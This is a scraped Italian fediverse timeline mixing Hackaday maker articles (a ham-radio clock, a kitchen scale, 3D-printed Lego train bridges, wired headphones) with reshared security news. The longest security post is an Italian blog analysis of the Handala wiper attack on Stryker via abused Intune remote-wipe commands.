Cybersecurity & cyberwarfare ha ricondiviso questo.

U.S. #CISA adds a flaw in #Wing #FTP #Server to its Known Exploited Vulnerabilities catalog
securityaffairs.com/189530/sec…
#securityaffairs #hacking
Cybersecurity & cyberwarfare ha ricondiviso questo.

A San Francisco si respira il futuro dell’IA. Non è così invitante


Car2go è il limite massimo di automazione perfetto.
Questa voce è stata modificata (2 settimane fa)

reshared this

Cybersecurity & cyberwarfare ha ricondiviso questo.

#Russia-linked #APT uses #DRILLAPP #backdoor to spy on Ukrainian targets
securityaffairs.com/189519/mal…
#securityaffairs #hacking #Ukraine

Every Ham Shack Needs a Ham Clock


The media in this post is not displayed to visitors. To view it, please log in.

Every ham radio shack needs a clock; ideally one with operator-friendly features like multiple time zones and more. [cburns42] found that most solutions relied too much on an internet connection for his liking, so in true hacker fashion he decided to make his own: the operator-oriented Ham Clock CYD.
A tabbed interface goes well with the touchscreen LCD.
The Ham Clock CYD is so named for being based on the Cheap Yellow Display (CYD), an economical ESP32-based color touchscreen LCD which provides most of the core functionality. The only extra hardware is a BME280 temperature and humidity sensor, and a battery-backed DS3231 RTC module, ensuring that accurate time is kept even when the device is otherwise powered off.

It displays a load of useful operator-oriented data on the touchscreen LCD, and even has a web-based configuration page for ease of use. While the Ham Clock is a standalone device that does not depend on internet access in order to function, it does have the ability to make the most of it if available. When it has internet access over the built-in WiFi, the display incorporates specialized amateur radio data including N0NBH solar forecasts and calculated VHF/HF band conditions alongside standard meteorological data.

The CYD, sensor, and RTC are very affordable pieces of hardware which makes this clock an extremely economical build. Check out the GitHub repository for everything you’ll need to make your own, and maybe even put your own spin on it with a custom enclosure. On the other hand, if you prefer your radio-themed clocks more on the minimalist side, this Morse code clock might be right up your alley.


hackaday.com/2026/03/16/every-…

Making a Better Kitchen Scale out of Junk Parts


The media in this post is not displayed to visitors. To view it, please log in.

Kitchen scales are plentiful and cheap, but their accuracy and measuring speed often leave a lot to be desired. In particular the filtering out of noise can make small changes a nightmare as e.g. adding a little bit of weight slowly can result in the result never updating. This frustrated [Mark Furneaux] enough that he dug up the load cell and metal base of a scrapped laboratory scale and added a strain gauge amplifier to build a better kitchen scale around it.

The only purpose-bought part was an HX710-based strain gauge amplifier module for $7 with LED display, with the metal base getting some metal bits welded onto it to hold said module as well as a push button and toggle switch. Existing wiring from the load cell was wired into the HX710 module, with power provided from a single 18650 Li-ion cell. This was paired with the standard TP4056-based module and its protection IC.

Ultimately the entire assembly looks very much bodged together, with plentiful zip ties, hot glue and messy welding, but it’s hard to deny that it seems to work well. A plastic cutting board makes for a good surface for the items being weighed, and measured drift across the range was about 200 mg, while the amplifier module updates the output in real-time so that you can see even the smallest changes and noise.

Even if you’re not lucky enough to have such a nice load cell and base kicking around, strain gauges are everywhere, and you can absolutely hack an existing (kitchen) scale to be better with some custom hard- and software.

youtube.com/embed/3ANcyO0-xRQ?…


hackaday.com/2026/03/16/making…

Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

Nell’acquario del fediverso. Il Fediverso come ecosistema e modello sociale

«Non è solo una delle famose bolle dei social, ma un sistema di acquari interconnessi, ognuno con popolazioni, temperature, salinità e pH diversi, e rappresenta un modello di socializzazione e di governo globale in cui gli amministratori hanno strutturato regole di convivenza che realizzano il bando degli intolleranti teorizzato da Karl Popper»

Di @macfranc su #IlPost

@fediverso

ilpost.it/2024/02/27/macchia-a…

Questa voce è stata modificata (1 anno fa)
Cybersecurity & cyberwarfare ha ricondiviso questo.

Archivio di videogiochi Myrient salvato dai fan

Un membro della comunità Save Myrient ha annunciato che il colossale archivio di videogiochi da 385 TB è stato “sottoposto a backup al 100%!” Questa risorsa di retrogaming era sull'orlo del collasso il mese scorso dopo che gli amministratori della raccolta hanno rivelato che finanziamenti insufficienti, costi crescenti e gestori di download abusivi stavano mettendo a dura prova l'operazione.

tomshardware.com/video-games/r…

@retrogaming

in reply to Marco Bresciani

"Sono Bender, inserire floppino" 😜 scusami, mi scatta in automatico…
Seriamente, son tutti giochi vintage, io mi chiedo ancora come si possa arrivare a quel volume di dati con giochi vecchi di trent'anni o più…
@informapirata @retrogaming
Questa voce è stata modificata (2 settimane fa)

Retrogaming e nostalgia reshared this.

Cybersecurity & cyberwarfare ha ricondiviso questo.

‘È incredibile’: fonti del Ministero della Difesa avvertono che il ruolo di Palantir al centro del governo è una minaccia per la sicurezza del Regno Unito

Gli esperti affermano che le affermazioni secondo cui i dati del Regno Unito restano di proprietà del governo non colgono il punto: l'azienda è in grado di tracciare un quadro dettagliato della popolazione britannica e persino di dedurre segreti di Stato. Rapporto di Charlie Young e Carole Cadwalladr

thenerve.news/p/palantir-techn…

@informatica

Unknown parent

mastodon - Collegamento all'originale

Generale Specifico

@chipchop_mast intanto, rompere le scatole chiedendo ai politici cosa ne sanno di chat control e sovranità digitale sarebbe un inizio.
Che risulti la domanda e la risposta eventuale.
Che si sappia chi e cosa abbia fatto nulla o qualcosa.
Iniziamo a chiedere conto dei nostri dati in mano allo stato.
Si protegge una dubbia tradizione culinaria come la carbonara ma non si batte ciglio a dare in mano a privati stranieri le cartelle sanitarie e fiscali di milioni di person

reshared this

Cybersecurity & cyberwarfare ha ricondiviso questo.

Pubblicato QUANTUM, l'inserto della Relazione Annuale 2026 che approfondisce la tecnologia quantistica

Si tratta di una delle frontiere più avanzate della competizione globale. Potenzialità e risvolti per la #SicurezzaNazionale

sicurezzanazionale.gov.it/data…

@informatica

How I 3D Printed My Own Lego-Compatible Train Bridges


The media in this post is not displayed to visitors. To view it, please log in.

Lego train sets have been available for decades, now. The Danish manufacturer long ago realized the magic of combining its building block sets with motors and plastic rails to create real working railways for children and adults to enjoy. Over the years, Lego has innovated through several generations of trains, from classic metal-rail systems to the more modern IR and later Bluetooth-controlled versions. The only thing largely missing over all that time, though…? A bridge!

Yes, Lego has largely neglected to build any bridges for its mainstream train lineup. There are aftermarket solutions, and innovative hacks invented by the community, all with their own limitations and drawbacks. This glaring oversight, though, seemed like a perfect opportunity to me. It was time to fire up the 3D printer and churn out a fully-realized Lego rail bridge of my very own.

Bridges Are Hard

I’ve experimented with building Lego rail bridges before, using standard track and household objects like cardboard, books, and beer. Unfortunately, it can be very difficult to support the track evenly at the joints which occur every 150mm, and derailments are common. Credit: author
There’s actually a good reason Lego bridges aren’t a big thing in the company’s own product lineup, beyond a few obscure historical parts. This is probably because they aren’t very practical. Lego locomotives are not particularly strong haulers, nor do they have excellent grip on the rails, and this makes them very poor at climbing even mild grades. Any official Lego bridge would have to be very long with a shallow slope just to allow a train to climb high enough to clear a locomotive on a track below. This would end up being an expensive set that would probably prove unpopular with the casual Lego train builder, even if the diehard enthusiasts loved it.

There are third-party options available out there. However, most rely on standard Lego track pieces and merely combine them with supports that hold them up at height. This can work in some cases, but it can be very difficult to do cool things like passing a Lego train under a bridge, for example. It can be hard to gain enough height, and the short length of Lego track pieces makes it hard to squeeze a locomotive between supports.

However, none of these problems are insurmountable if you’re dedicated to the task. The trick is in being able to make entire pieces of Lego track with custom geometry to suit your exact needs. I’ve always tried to add bridges to my Lego railways, and I’ve found that trying to do so with the standard track pieces is often difficult. At just 150 mm long, they require a lot of supports, particularly at the joints, and it can be difficult to build any sort of structure that is stable enough to hold together without a train derailing across it. After many prior experiments, I figured that 3D printing bespoke bridge pieces would probably be the way to go to build a stable Lego train bridge that actually works.

Research And Development

Recreating basic Lego rail geometry was task 1. Credit: author
I started my work by recreating the track geometry so that my 3D printed parts would work with official Lego track. I was able to recreate the rails and the inter-track coupler design, based on a drawing available at the L-Gauge website. From there, I began my bridge design, starting with picking the most critical number—the grade of the bridge. Having done some research on Lego trains online, combined with my own prior tests, I figured a 10 degree grade would be low enough for a Lego train to climb without too much trouble. I also wanted to make the individual bridge pieces as long as possible to reduce the number of joints involved. I landed on a figure of approximately 290 mm, as this was the largest track length I could fit by printing diagonally on my printer.
The basic bridge design. The three ramp pieces repeat on the other side. Credit: author
I quickly worked up a design that involved seven separate pieces to create a whole bridge. Three individual ramp pieces on each side, plus a central flat bridge piece that has a piece of track passing at a perpendicular angle underneath. In total, the whole bridge measures almost two meters long, mostly because Lego locomotives only like a gentle climb and it’s quite a hike to get high enough to clear a train passing below.
The arches and pillars are probably excessive but they allow the bridge to be printed without support. Credit: author
From the get go, I wanted to print without supports—both for speed and to save plastic. This took some experimentation, but I mostly achieved success by using arches and subtle curves to keep overhangs in check and create a structure that would print cleanly.

With that said, one might argue that the excessive amount of arches and pillars used in my design might have wasted more plastic than just using standard supports generated by the slicer. Regardless, I think the choice to go with arches gave the bridge a nice aesthetic befitting a good railway. I printed the bridge pieces in PLA at a layer height of 0.20 mm, using two-colored filament just because I could, and it was cheap at the store. While some of the diagonal stretches of the rails featured obvious layer lines, this didn’t seem to have any negative effect on performance. It did, however, give the trains a zippy sound when they climbed and descended the bridge.
The completed bridge, prior to construction of supporting railway infrastructure. Credit: authorShorter carriages work best due to the relatively sudden transition between the 10-degree grade and flat running. Credit: author
I set about testing the bridge design by inviting some friends over and building a railway in my living room. We set up a simple S-shaped loop that would allow a single train to test both the bridge itself and the passthrough track underneath. Early testing revealed some fun unexpected problems. Right off the bat, we found that one Lego locomotive had a low-slung piece that would smash into the track coupler as it came down off the bridge back on to the flat rails at ground level. Removing that piece barely compromised the look of the locomotive but enabled it to pass the bridge more easily.

We also soon found issues with carriages. Even at a subtle 10-degree grade, most Lego locomotives struggled to pull more than a single carriage up the slope. Further compounding the problem was that the momentum from the extra carriages on the downhill tended to overspeed the train and derail it at an immediately-following turn. Some carriages and locomotives were also simply incompatible with the bridge due to my design decisions. I had not paid much attention to the transitions on and off the sloped ramps. This meant that some longer carriages with wider-spread bogies would find themselves derailing as one set of wheels left the track while passing over the bridge. There were also some minor issues with the bridge pieces themselves and how they couple together. The Lego track coupling design is pretty good at snapping pieces together when they’re injection molded. It doesn’t work as well with softer 3D-printed PLA, nor is it good at locking together big heavy pieces of bridge that weigh many hundreds of grams each.
The custom bridge allows for the construction of fun new layouts that aren’t readily achievable with standard Lego parts. Credit: author
Nevertheless, the bridge design did mostly work if you were careful and only ran the right trains. With a layout built to suit the vagaries of over-bridge travel, with lots of straights for run-up and run-off, it was possible to climb and descend without too much trouble. The underpass track was also perfectly serviceable and presented precisely no problems during hours of play.

youtube.com/embed/TCQSsiFaXwY?…

This bridge design could be easily improved. I’d probably rework the design with a lower grade—maybe 7 degrees, maybe 5—and really smooth out the transitions on and off the slope to allow as many different Lego trains to use the bridge as possible. Beyond that, it would simply be a matter of improving printability and reducing plastic use to really make this project shine. For those eager to try printing what I built, the files are available, but just be wary that your mileage, and your train’s mileage, may vary.

The fun thing about 3D printers is that they are perfect for jobs like this. If you need to make a plastic part with specific geometry, it’s now almost trivial to do. That makes recreating or innovating on things like toys or home appliances really easy, and also very fun. I had a blast designing this bridge and putting it together, and even more fun playing trains with my friends. I’d highly recommend taking a shot yourself if you feel like tinkering with Lego railways at home!


hackaday.com/2026/03/16/how-i-…

Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

Come una tastiera virtuale ha messo a rischio milioni di PC Windows

📌 Link all'articolo : redhotcyber.com/post/come-una-…

#redhotcyber #news #windows #regpwn #vulnerabilita #sicurezzainformatica #hacking #cybersecurity #malware

LEGO Machine Plays Tic-Tac-Toe Without Electronics


The media in this post is not displayed to visitors. To view it, please log in.

Tic-Tac-Toe is a relatively simple game, and one of the few which has effectively been solved for perfect play. The nature of the game made it possible for [Joost van Velzen] to create a LEGO machine that can play the game properly in an entirely mechanical fashion.

The build features no electronics to speak of. Instead, it uses 52 mechanical logic gates and 204 bits of mechanical memory to understand and process the game state and respond with appropriate moves in turn. There are some limitations to the build, however—the game state always begins with the machine taking the center square. Furthermore, the initial move must always be played on one of two squares—given the nature of the game though, this doesn’t really make a difference.

It’s also worth heading over to the Flickr page for the project just to appreciate the aesthetics of the build. It’s styled in the fashion of an 18th-century automaton or similar. It’s also been shared on LEGO Ideas where it’s raised quite a profile.

If you’ve ever wanted to think about computing in a mechanical sense, this build is a great example of how it can be done. We often see some fun LEGO machines around these parts, from massive parts sorters to somewhat-functional typewriters.

youtube.com/embed/soklpa_JZOI?…


hackaday.com/2026/03/16/lego-m…

Cybersecurity & cyberwarfare ha ricondiviso questo.

#FBI launches inquiry into #Steam games spreading #malware
securityaffairs.com/189515/cyb…
#securityaffairs #hacking
Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

Parliamo del fronte cyber Iran-USA: Handala contro Stryker
#CyberSecurity
insicurezzadigitale.com/parlia…
Cybersecurity & cyberwarfare ha ricondiviso questo.

Parliamo del fronte cyber Iran-USA: Handala contro Stryker


@Informatica (Italy e non Italy)
E’ da un po’ che non riuscivo a prendere del tempo per aggiornare questo blog e, visti gli avvenimenti che hanno determinato e stanno determinando la sicurezza nelle ultime settimane, riapro con un post sull’Iran. L’11 marzo 2026 Stryker, uno dei colossi mondiali della tecnologia medicale, ha

reshared this

Cybersecurity & cyberwarfare ha ricondiviso questo.

Former Germany’s foreign intelligence VP hit in #Signal account takeover campaign
securityaffairs.com/189509/hac…
#securityaffairs #hacking #russia

Ask Hackaday: Wired or Wireless Headphones?


The media in this post is not displayed to visitors. To view it, please log in.

They say you should never throw out old clothes because they will come back in style one day. Maybe they are right. We noted in a recent BBC post that, apparently, wired headphones are making a comeback. Like many people, we were dismayed when Apple took the headphone jack out of the iPhone and, as [Thomas Germain] notes, even Google eventually ejected the normal headphone jack. (Although, in fairness, most of the Pixel phones we’ve seen come with a pair of USB-C earbuds.)

On the face of it, though, wireless seems to be a good idea. You can get cheap Bluetooth earbuds now, although maybe still not as cheap as wired buds. Sure, they sound terrible, but so do cheap buds. It is a pain to charge them, of course, but not having to untangle wires is a benefit. On the other hand, you never have to charge your wired headphones.

So why are people suddenly going back to wires? According to the BBC and analytics firm Circana, the second half of 2025 saw an explosion in wired headphone sales, and sales continued to rise in 2026.

youtube.com/embed/vGH5220CHuY?…

Quality of Sound


The biggest reason cited was sound quality. While Bluetooth has made huge strides in sound quality, you are still trading something for wireless. We have to admit, we get annoyed when the Bluetooth drops out, but we wonder how many people can really hear much difference in audio quality? If you care about latency, maybe that’s a point in the wired gear’s favor. But if your song starts 250 milliseconds late, you probably don’t care. It is only an issue when you have video or games.

Many people, when using a modern Bluetooth stack, can’t tell the difference in audio quality between wired and wireless, especially with normal source material and in typical listening environments.

According to [SoundGuys], while Bluetooth is technically worse, if you are over 24 or not in a perfectly quiet environment, you probably can’t tell the difference. Another study found that casual listeners could only guess which headphones were wireless 50% of the time. Even two pro audio people got it wrong 30% of the time.

It Got Better


The problem historically with Bluetooth is that it creates a digital stream to the headphones, which is compressed and decompressed using a codec. The original codec was SBC (Subband Codec), and it didn’t sound that great.

However, as technology gets better, so do the codecs. AAC, LDAC, and others sound great. LDAC, for example, transmits audio at roughly 990 kbps and with very little distortion.

youtube.com/embed/XU_XUgnvgt4?…

So when you are looking at Bluetooth sound, you have to account for several things. If your source or destination doesn’t support modern codecs, it might not sound as good as it could. In addition, you are dealing with the headphone’s internal digital-to-analog converter. If you think your $10 earbuds have a converter that matches the audio output from your phone or motherboard, you will probably be disappointed. But that’s not a fault inherent with Bluetooth. Cheap sound devices sound worse than expensive ones, in general.

Other Reasons


There are other reasons to go wired. Apparently, some social media influencers have decided that the right pair of wires dangling from your ears is a fashion accessory. Maybe some of it is like the resurgence of vinyl records or typewriters: nostalgia. Or, perhaps it is just a fad. As a practical matter, it does help people see that you are just sitting at your desk swaying for no reason.

Apparently, even the brand and design of headphones are important to fashionistas. For example, the three-year-old video below shows how old Koss headphones with some color changes went viral. (Although of course you can also get a Bluetooth variant.)

youtube.com/embed/eehbsqKmyg8?…

While this might not make sense to a Hackaday crowd, headphones have long been a fashion accessory, and headphones like Beats were, at least at one point, the must-have accessory for some people.

Of course, if you really want to make a statement, you can check whether any of the 10 $135,000 headphones are in stock. Or, try a $750,000 pair of Beats, which probably don’t sound as good as you would hope for that price.

Back to Reality


There are people who swear they need gold-plated cables or ones with no oxygen or whatever to get the perfect sound. Tests involving sending audio through a banana don’t back that up.

So, sure, you need to invest in good-quality gear. You really need to make sure the whole setup supports something like aptX, LDAC, or even AAC. You also need a good source. Old movies don’t look better on an 8K TV; after all, why should your headphones improve your 1979 mix tape digitized at 32k?

youtube.com/embed/IvIYh87Eihs?…

Unless you are worried about latency or you experience dropouts for some reason, there is very little difference for most people. Of course, if you want to use a wired headphone on a modern phone, you probably need an adapter or USB headphones, which basically have the adapter built in. And your audio will only be as good as that adapter, too, so choose wisely. Don’t forget to pick the right cables, too.

If you are experiencing dropouts, you may need better equipment. Or maybe just take your phone out of your pocket with the keys and the RFID-blocking wallet. Bluetooth can, in theory, travel 30 ft, but reality is something else, and interference from other devices can also be a problem, especially if you have a dual WiFi/Bluetooth device in your computer. We’ve heard, too, that unpairing and repairing can sometimes help, although you wouldn’t think it should matter.

One thing we do suggest. As long as wired headphones are a fad, it is probably a great time to list your old wired gear on eBay, Facebook Marketplace, or a similar site. Fads drive prices up, and the old cans may never be worth so much again.

Your Turn


So what do you think? Can you really tell the difference? What’s your daily driver? Let us know in the comments.


hackaday.com/2026/03/16/ask-ha…

Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

“Ogni cosa visibile ne nasconde altre invisibili”. I cigni neri dell’algoritmo

📌 Link all'articolo : redhotcyber.com/post/ogni-cosa…

#redhotcyber #news #intelligenzaartificiale #algoritmiinnovativi #anomalie #bigdata #analisi #segnalideboli

Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

Automazione Windows sotto accusa: la patch che chiude il varco

📌 Link all'articolo : redhotcyber.com/post/automazio…

#redhotcyber #news #cybersecurity #sicurezzainformatica #vulnerabilita #windows #deploymentservices #microsoft

Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

The media in this post is not displayed to visitors. To view it, please go to the original post.

Parliamo del fronte cyber Iran-USA: Handala contro Stryker
#CyberSecurity
insicurezzadigitale.com/parlia…


Parliamo del fronte cyber Iran-USA: Handala contro Stryker


E’ da un po’ che non riuscivo a prendere del tempo per aggiornare questo blog e, visti gli avvenimenti che hanno determinato e stanno determinando la sicurezza nelle ultime settimane, riapro con un post sull’Iran.

L’11 marzo 2026 Stryker, uno dei colossi mondiali della tecnologia medicale, ha scoperto cosa significa avere l’intero ambiente Microsoft trasformato in un kill‑switch remoto, azionato da un gruppo hacktivista filo‑iraniano che si firma Handala Hack e che l’intelligence occidentale riconduce alla costellazione iraniana Yellow Phobos / Void Manticore / Red Sandstorm. Nel giro di minuti, migliaia di endpoint aziendali – dai server Windows alle workstation fino agli smartphone con profili corporate – sono stati resettati o wipati, i portali di login hanno iniziato a mostrare il logo di Handala e la supply chain sanitaria globale ha avuto un assaggio molto concreto di cosa significhi un attacco distruttivo contro un fornitore critico.​

La narrazione ufficiale dell’azienda, almeno nelle prime ore, è stata prudente: “network disruption”, incidente circoscritto al “Microsoft environment”, nessuna evidenza pubblica di ransomware o malware tradizionale, nessun riferimento esplicito a wiper nel comunicato ai clienti. Eppure le evidenze raccolte nei report di threat intelligence e le testimonianze interne vanno in tutt’altra direzione, parlando di cancellazione massiva di dati, factory reset orchestrati da remoto e indisponibilità diffusa dei dispositivi in decine di sedi nel mondo. Il punto interessante, per una community nerd e tecnica, non è solo il “chi” ma soprattutto il “come”: invece di far leva su un ennesimo payload custom, Handala avrebbe scelto un approccio quasi “living off the SaaS”, abusando di Microsoft Intune per distribuire comandi di remote wipe perfettamente legittimi ma usati con finalità distruttive.

Per capire perché questo incidente pesa più di altri sul piano strategico bisogna partire dal contesto geopolitico. Handala rivendica l’operazione come ritorsione per l’attacco contro la scuola di Minab in Iran, incastonandola in un ciclo di escalation che vede Stati Uniti e Israele da un lato e Teheran dall’altro, con il cyber come teatro operativo ormai pienamente integrato in quello cinetico. Sullo sfondo c’è il ruolo del Corpo delle Guardie Rivoluzionarie Islamiche (IRGC), che tramite media di Stato come l’agenzia Tasnim ha iniziato a pubblicare liste di “obiettivi legittimi” tra le big tech occidentali, indicando strutture di Google, Microsoft, Nvidia, IBM, Oracle, Palantir e Amazon in Israele e nel Golfo come possibili target di future azioni di “infrastructure warfare”. In questo schema, colpire un fornitore medicale come Stryker non è solo un’operazione di sabotaggio episodica, ma un messaggio: l’Iran‑verse cyber non si limita più a entità governative o utility regionali, può aggredire nodi sistemici della sanità globale e disarticolare la capacità operativa degli ospedali occidentali senza toccare direttamente i loro sistemi clinici.

Dal punto di vista tecnico, il quadro che emerge secondo diverse fonti di cyber intelligence è quello di un’operazione costruita intorno a un wiper, o comunque a un effetto wiper‑like, con un’architettura pensata per massimizzare la distruzione più che l’estorsione. A differenza del classico schema ransomware – cifratura, nota di riscatto, canale di negoziazione – qui il focus è la cancellazione irreversibile dei dati sui sistemi aziendali, l’arresto forzato della produzione, il lock‑out degli utenti dalle applicazioni critiche. Nelle prime ore Stryker ha parlato di impatto confinato all’ecosistema Microsoft, ma i report descrivono un effetto domino su più regioni, dal quartier generale europeo in Irlanda agli stabilimenti di produzione in Nord America e Asia, con shutdown degli ambienti industriali, perdita dei canali di comunicazione interna e cancellazione remota degli endpoint gestiti via MDM.

Il passaggio chiave è il controllo dell’infrastruttura di gestione centralizzata. Yellow Phobos è noto per un modus operandi identity‑centric: phishing mirato, furto di credenziali, abuso di account validi, focus su Microsoft Entra ID e Microsoft 365, e pivot sugli strumenti di orchestrazione come Intune, automazioni Azure o Group Policy per scalare rapidamente i privilegi dentro il tenant. Nel caso Stryker, fonti vicine all’indagine hanno raccontato come il gruppo non avrebbe necessariamente spinto un eseguibile wiper classico, ma sfruttato la console Intune per emettere comandi di remote wipe e factory reset verso qualsiasi dispositivo associato al profilo aziendale, inclusi i telefoni personali BYOD con un work profile. Il risultato è un “wiper as a feature”: invece di un malware che sovrascrive i settori del disco, una tempesta di azioni amministrative legittime ma concatenate per ottenere lo stesso esito, con un livello di tracciabilità e attribuzione ancora più insidioso perché si confonde con l’attività di gestione quotidiana.

Questo approccio è perfettamente coerente con le TTP mappate nel framework MITRE ATT&CK per Handala / Yellow Phobos negli ultimi anni. Sul fronte dell’accesso iniziale, il gruppo ha storicamente combinato spear phishing (T1566) con l’exploitation di servizi esposti (T1190) e il riuso di account validi (T1078), spesso attraverso campagne di brand impersonation che mimano attori fidati come provider di sicurezza o vendor IT per indurre l’utente a consegnare credenziali o token. Una volta dentro, la persistenza passa attraverso l’abuso sistematico di account amministrativi compromessi, l’uso estensivo di interpreter di scripting e strumenti nativi (T1059) e l’escalation via exploitation di vulnerabilità note (T1068), con il movimento laterale orchestrato tramite servizi remoti (T1021) e alternate authentication material (T1550) per attraversare velocemente boundary logici e geografici. L’impatto, come dimostra il caso Stryker, è centrato su data destruction (T1485), endpoint DoS (T1499) e defacement (T1491), con i portali di autenticazione brandizzati Handala a sigillare visivamente la presa di controllo dell’infrastruttura.

Un altro elemento non trascurabile è il ruolo delle identità hacktiviste multiple che orbitano intorno a Yellow Phobos. Handala Hack è solo una delle maschere: le cronache degli ultimi anni hanno già visto Homeland Justice rivendicare operazioni distruttive contro il governo albanese, compresa la compromissione dei sistemi email del parlamento con conseguente sospensione dei servizi, mentre Anonymous for Justice ha firmato presunti wiping contro target israeliani nei settori legale, utilities e servizi finanziari. La logica è quella di una franchising strategy ideologica: nomi e logo cambiano a seconda del messaggio politico e del teatro operativo, ma le infrastrutture, le toolchain e il know‑how restano nelle mani dello stesso cluster operativo legato all’apparato di sicurezza iraniano. Per chi difende, questo rende meno utile concentrarsi sulla “sigla” e obbliga a riconoscere pattern tecnici ricorrenti, come l’abuso di provider di cloud occidentali, il riciclo creativo di domini typo‑squatting e un elenco crescente di IoC che spaziano da indirizzi IP a domini come handala‑hack.to, justicehomeland.* e una lunga serie di pseudo‑brand di big tech usati per phishing e comando e controllo.

Sul terreno, l’effetto dell’attacco è stato immediato anche fuori da Stryker. In Australia, ad esempio, le autorità sanitarie hanno messo in stato di allerta gli ospedali che dipendono da dispositivi e impianti Stryker, consapevoli che una disruption prolungata nella catena di fornitura può tradursi in ritardi nelle procedure chirurgiche, difficoltà nella manutenzione e nei richiami di sicurezza dei device. Al di là del singolo caso, il messaggio per il settore healthcare è che la resilienza non può essere pensata solo dentro il perimetro ospedaliero: un wiper‑driven incident su un player di medtech upstream può avere un impatto sistemico paragonabile a un attacco diretto a un grande ospedale universitario o a una centrale elettrica regionale.

Guardando oltre il perimetro sanitario, l’elenco di minacce diffuse dall’IRGC contro data center e uffici di big tech nel Golfo e in Israele apre un fronte nuovo, in cui i cloud provider e i grandi vendor di AI, storage e analytics non sono più solo infrastrutture di riferimento ma target dichiarati di operazioni di “infrastructure warfare”. Gli episodi recenti che citano attacchi con droni contro data center AWS negli Emirati Arabi Uniti e in Bahrain – ancora da chiarire nei dettagli tecnici – confermano che il confine tra attacco fisico e attacco logico si va sfumando: la stessa facility può finire in un rapporto di intelligence come potenziale obiettivo cinetico e, contemporaneamente, come nodo da degradare via campagne cyber destruttive o di preposizionamento.

All’interno di un’azienda, ente o organizzazione con footprint cloud esteso e dipendenza strutturale da ambienti Microsoft, la lezione del caso Stryker è tanto banale quanto scomoda: la tua superficie d’attacco più critica non è solo l’ennesimo zero‑day, ma il layer di identity e di gestione centralizzata che hai costruito per semplificarti la vita. La strategia di mitigazione descritta – MFA ovunque, soprattutto sugli account privilegiati, principle of least privilege spinto sulle console amministrative, PAM per isolare e tracciare l’uso delle credenziali ad alto impatto, RBAC rigoroso sui sistemi di endpoint management, EDR e SIEM con regole specifiche per rilevare movimenti laterali e azioni massive di wipe/reset – non è più “best practice”, è la baseline minima per sopravvivere a un avversario che ha dimostrato di saper trasformare Intune nel proprio wiper distribuito. L’altro pezzo del puzzle è la preparedness: backup offline e immutabili delle configurazioni critiche, runbook di incident response che contemplino la perdita simultanea di migliaia di endpoint, canali di comunicazione fuori banda pronti per quando la posta e i sistemi di messaggistica aziendale spariscono in un colpo solo.

In prospettiva, il caso Stryker rischia di essere ricordato come uno spartiacque, non tanto per la tecnologia impiegata – nessun exploit miracoloso, nessun malware da collezione – ma per il salto concettuale nell’abuso delle piattaforme di gestione cloud come arma di distruzione su larga scala. È un modello replicabile, economicamente efficiente per l’attaccante e perfettamente allineato a una dottrina in cui il cyber non serve solo a rubare dati o a fare pressione tramite estorsione, ma a erodere la capacità industriale e la fiducia nelle infrastrutture digitali dei Paesi avversari.


Questa voce è stata modificata (2 settimane fa)
Cybersecurity & cyberwarfare ha ricondiviso questo.

Sperimentazioni cliniche, la proposta di EDPB ed EDPS per una legge UE di semplificazione


@Informatica (Italy e non Italy)
EDPB ed EDPS hanno adottato un parere congiunto sulla proposta della Commissione UE di una legge in materia di biotecnologie. L’intento è rafforzare i settori della biotecnologia e della bio-fabbricazione, specialmente in ambito

reshared this

Cybersecurity & cyberwarfare ha ricondiviso questo.

Il rischio dell’Agentic Blabbering nei browser intelligenti: cos’è e come difendersi


@Informatica (Italy e non Italy)
L’Agentic Blabbering è una nuova tecnica malevola che sfrutta un comportamento inatteso nei browser agentici per rubare informazioni riservate. Ecco in che modo e quali sono le misure di sicurezza da adottare per mitigare questo nuovo

Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please log in.

Parliamo del fonte cyber Iran-USA: Handala contro Stryker


@Informatica (Italy e non Italy)
E’ da un po’ che non riuscivo a prendere del tempo per aggiornare questo blog e, visti gli avvenimenti che hanno determinato e stanno determinando la sicurezza nelle ultime settimane, riapro con un post sull’Iran. L’11 marzo 2026 Stryker, uno dei colossi mondiali della tecnologia medicale, ha


Parliamo del fronte cyber Iran-USA: Handala contro Stryker


E’ da un po’ che non riuscivo a prendere del tempo per aggiornare questo blog e, visti gli avvenimenti che hanno determinato e stanno determinando la sicurezza nelle ultime settimane, riapro con un post sull’Iran.

L’11 marzo 2026 Stryker, uno dei colossi mondiali della tecnologia medicale, ha scoperto cosa significa avere l’intero ambiente Microsoft trasformato in un kill‑switch remoto, azionato da un gruppo hacktivista filo‑iraniano che si firma Handala Hack e che l’intelligence occidentale riconduce alla costellazione iraniana Yellow Phobos / Void Manticore / Red Sandstorm. Nel giro di minuti, migliaia di endpoint aziendali – dai server Windows alle workstation fino agli smartphone con profili corporate – sono stati resettati o wipati, i portali di login hanno iniziato a mostrare il logo di Handala e la supply chain sanitaria globale ha avuto un assaggio molto concreto di cosa significhi un attacco distruttivo contro un fornitore critico.​

La narrazione ufficiale dell’azienda, almeno nelle prime ore, è stata prudente: “network disruption”, incidente circoscritto al “Microsoft environment”, nessuna evidenza pubblica di ransomware o malware tradizionale, nessun riferimento esplicito a wiper nel comunicato ai clienti. Eppure le evidenze raccolte nei report di threat intelligence e le testimonianze interne vanno in tutt’altra direzione, parlando di cancellazione massiva di dati, factory reset orchestrati da remoto e indisponibilità diffusa dei dispositivi in decine di sedi nel mondo. Il punto interessante, per una community nerd e tecnica, non è solo il “chi” ma soprattutto il “come”: invece di far leva su un ennesimo payload custom, Handala avrebbe scelto un approccio quasi “living off the SaaS”, abusando di Microsoft Intune per distribuire comandi di remote wipe perfettamente legittimi ma usati con finalità distruttive.

